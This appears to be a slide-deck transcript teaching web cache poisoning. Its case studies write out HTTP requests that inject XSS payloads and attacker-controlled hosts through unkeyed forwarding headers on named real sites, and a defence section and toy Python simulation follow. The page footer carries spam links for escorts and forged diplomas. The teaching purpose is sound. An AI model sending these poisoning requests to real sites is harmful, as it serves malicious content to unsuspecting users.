Web Cache Poisoning
- Kuldeep Pandya
About Me
● A neophyte
● Web enthusiast
● iAm NoT yEt wORkInG iAm sTiLl sTudiNg (◕‿◕)
Overview
● Which cache poisoning are we talking about?
● Quickly Recalling Caching
● Case Studies
● Practical Time
● Defense
Web Cache Poisoning at a glance
Web Cache Poisoning is NOT
● Web Cache Deception
● Browser Cache Poisoning
● Request Smuggling
● Response Splitting
● DNS Cache Poisoning
How response caching works
Web Cache Poisoning
Cache Keys
GET /bootstrap.css HTTP/1.1
Host: example.com
User-Agent: Chrome/71.0….Linux/4.15
Blah: …
● Cache keys are used to uniquely identify a cached object
Unkeyed Inputs and key collision
GET /some_page.html HTTP/1.1
Host: example.com
User-Agent: Chrome/71.0….
Blah: …
Cookie: language=english
Blah: ..
GET /some_page.html HTTP/1.1
Host: example.com
User-Agent: Chrome/71.0….
Blah: …
Cookie: language=hindi
Blah: ..
Request:
GET /page.html HTTP/1.1
Host: example.com
Blah: …
Cookie: language=english
Response:
Blah…
<title>Hello World</title>
Blah...
Request:
GET /page.html HTTP/1.1
Host: example.com
Blah: …
Cookie: language=hindi
Response:
Blah…
<title>नमस्ते दुनिया</title>
Blah...
Request:
GET /page.html HTTP/1.1
Host: example.com
Blah: …
Cookie: language=english
Response:
Blah…
<title>Hello World</title>
Blah...
Request:
GET /page.html HTTP/1.1
Host: example.com
Blah: …
Cookie: language=hindi
Cached Response:
Blah…
<title>Hello World</title>
Blah...
How do we poison caches?
● Using unkeyed inputs like HTTP Headers
● Using Request Smuggling
● Using Response Splitting
➔ This presentation focuses on exploitation via HTTP headers
Approach to web cache poisoning
Quick Example On Web Cache Poisoning
A normal request
Request:
GET /login.php HTTP/1.1
Host: 191.168.56.101
Blah: …
Response:
Blah: ...
<img src="192.168.56.101/image.png" />
Blah...
A funny request
Request:
GET /login.php HTTP/1.1
Host: 192.168.56.101
X-Forwarded-Host: lol"/><svg onload='alert(1)'>
Blah: ...
Response:
Blah: …
<img src="lol"/><svg onload='alert(1)'>/image.png" />
We all like practicals, don't we?
Case Studies
Cached XSSed Response in redhat.com
GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>
HTTP/1.1 200 OK
Cache-Control: public, no-cache
Blah…
<meta property="og:image"
content="https://a."><script>alert(1)</script>"/>
Discreet Poisoning
● We just poisoned the cache for https://redhat.com/en?dontpoisoneveryone=1
● We need to be the first to send the request whenever this cache expires in order to poison the site's legitimate users.
● We need to reverse engineer the cache expiry system and crawl through the documentation to figure out the exact time the cached object will expire.
unity3d.com
Request:
GET / HTTP/1.1
Host: unity3d.com
X-Host: portswigger-labs.net
HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800
…
<script src="https://portswigger-labs.net/sites/files/foo.js"></script>
Selective Poisoning
GET / HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 … Firefox/60.0
X-Forwarded-Host: a"><iframe onload=alert(1)>
HTTP/1.1 200 OK
X-Served-By: cache-lhr6335-LHR
Vary: User-Agent, Accept-Encoding
…
<link rel="canonical" href="https://a">a<iframe
onload=alert(1)>
</iframe>
DOM Poisoning
Request:
GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: canary
Response:
HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront
…
<body data-site-root="https://canary/">
Request:
GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: id.burpcollaborator.net
Response:
HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront
…
<body data-site-root="https://id.burpcollaborator.net/">
Request:
GET /api/i18n/es HTTP/1.1
Host: catalog.data.gov
Response:
HTTP/1.1 200 OK
…
{"Show more":"Mostrar más"}
Request:
GET /api/i18n/es HTTP/1.1
Host: portswigger-labs.net
Response:
HTTP/1.1 200 OK
…
{"Show more":"<svg onload=alert(1)>"}
Mozilla SHIELD
● A cool feature to install addons in the background for marketing purposes
● This feature became famous for forcefully installing the Mr. Robot extension in the background
● They were using Nginx for caching
● Mozilla sent a weird request which contained the Origin header in all lowercase
GET /api/v1/recipe/signed/ HTTP/1.1
Blah: ...
origin: null
Blah: ...
Request:
GET /api/v1/ HTTP/1.1
Host: normandy.cdn.mozilla.net
X-Forwarded-Host: xyz.burpcollaborator.net
HTTP/1.1 200 OK
{
...
"recipe-list": "https://xyz.burpcollaborator.net/api/v1/recipe/",
"recipe-signed": "https://xyz.burpcollaborator.net/api/v1/recipe/signed/",
...
}
● Signing was in place, so we couldn't install any addon of our choice
● Backend Mozilla systems that use unsigned recipes let us peek into the system and might help us obtain the signing key
● But we could still perform a DDoS
● We could install already signed addons
Route Poisoning in goodhire.com
● Some applications dumbly use request headers to generate URLs and use them for routing :)
● goodhire.com is hosted on hubspot.com, which uses a Cloudflare caching server.
Route Poisoning in goodhire.com
Request:
GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Server: canary
Response:
HTTP/1.1 404 Not Found
CF-Cache-Status: MISS
...
<title>HubSpot - Page not found</title>
<p>The domain canary does not exist in our system.</p>
Request:
GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Host: portswigger-labs-4223616.hs-sites.com
Response:
HTTP/1.1 200 OK
...
<script>alert(document.domain)</script>
Hidden route poisoning
● This vulnerability was in blog.cloudflare.com, which was using its own caching service
● blog.cloudflare.com is hosted using Ghost.
A normal fail response
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: canary
Response:
HTTP/1.1 302 Found
Location: https://ghost.org/fail/
Supplying an already hosted website
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: blog.binary.com
Response:
HTTP/1.1 200 OK
Normal response
Still No Luck :(
B...bu….but what if we use a website hosted on Ghost?
Request:
GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: noshandnibble.ghost.io
Response:
HTTP/1.1 302 Found
Location: http://noshandnibble.blog/
How much damage can we do with it?
● Files that were cached
a. jpg
b. png
c. pdf
d. js
e. css
Bypassing mixed-content protection
● Mixed content is when your website is served over HTTPS and requests some resource via HTTP.
● Browsers block this type of import; this feature is called mixed-content protection.
● The redirect Ghost issued was to HTTP rather than HTTPS, which was a big obstacle.
Again stuck :/
Luckily, bounty hunters helped
● Safari's HSTS handling automatically upgrades the redirect to HTTPS
● HSTS is a mechanism used to prevent data from being eavesdropped by upgrading HTTP to HTTPS.
● Edge's handling of the 302 response completely bypasses mixed-content protection
Chaining unkeyed inputs
● Sometimes an unkeyed input only confuses one part of the application.
● We need to chain unkeyed inputs in order to get something useful
Request 1
Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: xyz
Response:
HTTP/1.1 200 OK
Set-Cookie: locale=en; domain=xyz
Request 2
Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Scheme: nothttps
Response:
HTTP/1.1 301 Moved Permanently
Location: https://redacted.net/en
Request 1 + Request 2 = WCP
Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: attacker.com
X-Forwarded-Scheme: nothttps
Response:
HTTP/1.1 301 Moved Permanently
Location: https://attacker.com/en
Open Graph Hijacking
● Here's everyone's favourite: Facebook hacking!
● Open Graph is a protocol developed by Facebook which allows integration between Facebook and other apps.
● But what if we cache a malicious page which will in turn share what we want to share? Let's try it out.
Request:
GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: attacker.com
Response:
HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
…
<meta property="og:url" content='https://attacker.com/en'/>
Time for practicals!!!
Defense
● Do NOT use caching at all!
● Avoid taking input from headers.
● If you do, include them in the cache key.
● Use tools such as Burp's active scanner or Param Miner to find unkeyed inputs.
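To make the key-collision slides and the defense list concrete, here is a toy cache simulation (an added example, not code from the talk): an origin that reflects X-Forwarded-Host into its HTML, behind a shared cache run under three policies, the default host-plus-path key, the header included in the key, and the header stripped at the edge. The header set, hostnames and policies are assumptions constructed for this example.

```python
"""Toy model of a shared cache in front of an origin that reflects the
X-Forwarded-Host header into its HTML, as in the talk's case studies.
Constructed for illustration: the origin, hostnames and policies are
assumptions, not the talk's code or any real product's behaviour.
"""
from dataclasses import dataclass, field
from html import escape
from typing import Callable, Dict, Tuple

Request = Dict[str, str]            # "path" plus lower-cased header names
CacheKey = Tuple[str, ...]

# Headers the origin honours but a default cache key ignores (assumed set).
UNKEYED_HEADERS = ("x-forwarded-host", "x-forwarded-scheme", "x-host")


def origin(req: Request) -> str:
    """Origin server that trusts X-Forwarded-Host when building absolute
    URLs. Output is HTML-escaped, so the toy is not script-injectable, yet
    a poisoned copy still points every later visitor at the injected host."""
    host = req.get("x-forwarded-host", req["host"])
    return f'<img src="https://{escape(host, quote=True)}/image.png" />'


@dataclass
class Cache:
    """Minimal shared cache: key_fn decides what the cache key covers,
    sanitize runs on the request before lookup and before forwarding."""
    key_fn: Callable[[Request], CacheKey]
    sanitize: Callable[[Request], Request] = lambda r: r
    store: Dict[CacheKey, str] = field(default_factory=dict)
    hits: int = 0

    def get(self, req: Request) -> str:
        req = self.sanitize(req)
        key = self.key_fn(req)
        if key in self.store:
            self.hits += 1
            return self.store[key]
        body = origin(req)           # cache miss: fetch from origin and store
        self.store[key] = body
        return body


# Policy 1: default-style key (host + path). The reflected header is
# unkeyed, so one tampered response is served to everyone: key collision.
def key_default(req: Request) -> CacheKey:
    return (req["host"], req["path"])


# Policy 2 ("if you do take input from headers, include them in the cache
# key"): each distinct header value gets its own cache entry.
def key_with_headers(req: Request) -> CacheKey:
    return key_default(req) + tuple(req.get(h, "") for h in UNKEYED_HEADERS)


# Policy 3 ("avoid taking input from headers"): drop them at the edge so
# the origin never sees them; the default key is then safe to keep.
def strip_unkeyed(req: Request) -> Request:
    return {k: v for k, v in req.items() if k not in UNKEYED_HEADERS}


def run_policy(cache: Cache) -> Dict[str, object]:
    """Replay the talk's scenario: a request carrying X-Forwarded-Host
    arrives first, then a normal user asks for the same page. Reports
    whether the normal user received the tampered copy, and the hit count
    (so we can see which defence keeps the cache useful)."""
    tampered: Request = {"path": "/login.php", "host": "example.com",
                         "x-forwarded-host": "attacker.example"}  # constructed
    normal: Request = {"path": "/login.php", "host": "example.com"}
    cache.get(tampered)
    body = cache.get(normal)
    return {"poisoned": "attacker.example" in body, "hits": cache.hits}


if __name__ == "__main__":
    policies = [("default key", Cache(key_default)),
                ("header in key", Cache(key_with_headers)),
                ("headers stripped", Cache(key_default, sanitize=strip_unkeyed))]
    for name, cache in policies:
        print(f"{name:17s} -> {run_policy(cache)}")
```

Note that both defences stop the collision, but only stripping the header keeps the cache hit rate: keying on a free-form header lets any client create its own cache entry, which is a cache-busting cost to weigh.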
Thanks
● Connect with me
○ kuldeep.pandya.77799@Facebook
○ some_dank_boi@Instagram
○ Predator77799@Twitter
Credits
James Kettle
albinowax@Twitter
References:
https://portswigger.net/blog/practical-web-cache-poisoning
https://youtu.be/j2RrmNxJZ5c

Weitere ähnliche Inhalte

Was ist angesagt?

Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Nabin Dutta
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Daniel Tumser
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerabilitySoumyasanto Sen
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Ritesh Gupta
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and AwarenessAbdul Rahman Sherzad
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 

Was ist angesagt? (20)

Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerability
 
Web application security
Web application securityWeb application security
Web application security
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 

Ähnlich wie Web Cache Poisoning

DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksFelipe Prado
 
Web performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionWeb performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionseanwalbran
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …Jinglun Li
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
Altitude SF 2017: The power of the network
Altitude SF 2017: The power of the networkAltitude SF 2017: The power of the network
Altitude SF 2017: The power of the networkFastly
 
Design Web Service API by HungerStation
Design Web Service API by HungerStationDesign Web Service API by HungerStation
Design Web Service API by HungerStationArabNet ME
 
Optimising Web Application Frontend
Optimising Web Application FrontendOptimising Web Application Frontend
Optimising Web Application Frontendtkramar
 
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."Dongwook Lee
 
Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014bryan_call
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?timbc
 
Web performance mercadolibre - ECI 2013
Web performance   mercadolibre - ECI 2013Web performance   mercadolibre - ECI 2013
Web performance mercadolibre - ECI 2013Santiago Aimetta
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
 
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...Ontico
 
Integrated Cache on Netscaler
Integrated Cache on NetscalerIntegrated Cache on Netscaler
Integrated Cache on NetscalerMark Hillick
 
Implementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesImplementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesViet-Hoang Tran
 
HTTP fundamentals for developers
HTTP fundamentals for developersHTTP fundamentals for developers
HTTP fundamentals for developersMario Cardinal
 
AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013Andrew Khoury
 
Generating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status CodesGenerating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status CodesDeeptiJava
 

Ähnlich wie Web Cache Poisoning (20)

DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacks
 
Web performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transitionWeb performance across the HTTP to HTTPS transition
Web performance across the HTTP to HTTPS transition
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTP
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
Altitude SF 2017: The power of the network
Altitude SF 2017: The power of the networkAltitude SF 2017: The power of the network
Altitude SF 2017: The power of the network
 
Design Web Service API by HungerStation
Design Web Service API by HungerStationDesign Web Service API by HungerStation
Design Web Service API by HungerStation
 
Optimising Web Application Frontend
Optimising Web Application FrontendOptimising Web Application Frontend
Optimising Web Application Frontend
 
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
IBM dwLive, "Internet & HTTP - 잃어버린 패킷을 찾아서..."
 
Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014Choosing A Proxy Server - Apachecon 2014
Choosing A Proxy Server - Apachecon 2014
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
Web performance mercadolibre - ECI 2013
Web performance   mercadolibre - ECI 2013Web performance   mercadolibre - ECI 2013
Web performance mercadolibre - ECI 2013
 
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...
 
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
Как Web-акселератор акселерирует ваш сайт / Александр Крижановский (Tempesta ...
 
Integrated Cache on Netscaler
Integrated Cache on NetscalerIntegrated Cache on Netscaler
Integrated Cache on Netscaler
 
Implementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and ChallengesImplementing Early Hints in Chrome - Approaches and Challenges
Implementing Early Hints in Chrome - Approaches and Challenges
 
HTTP fundamentals for developers
HTTP fundamentals for developersHTTP fundamentals for developers
HTTP fundamentals for developers
 
HTTP
HTTPHTTP
HTTP
 
AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013AEM (CQ) Dispatcher Caching Webinar 2013
AEM (CQ) Dispatcher Caching Webinar 2013
 
Generating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status CodesGenerating the Server Response: HTTP Status Codes
Generating the Server Response: HTTP Status Codes
 

Kürzlich hochgeladen

办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一z xss
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleanscorenetworkseo
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Sonam Pathan
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxeditsforyah
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMgdsc13
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhimiss dipika
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)Christopher H Felton
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMartaLoveguard
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 

Kürzlich hochgeladen (20)

办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleans
 
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
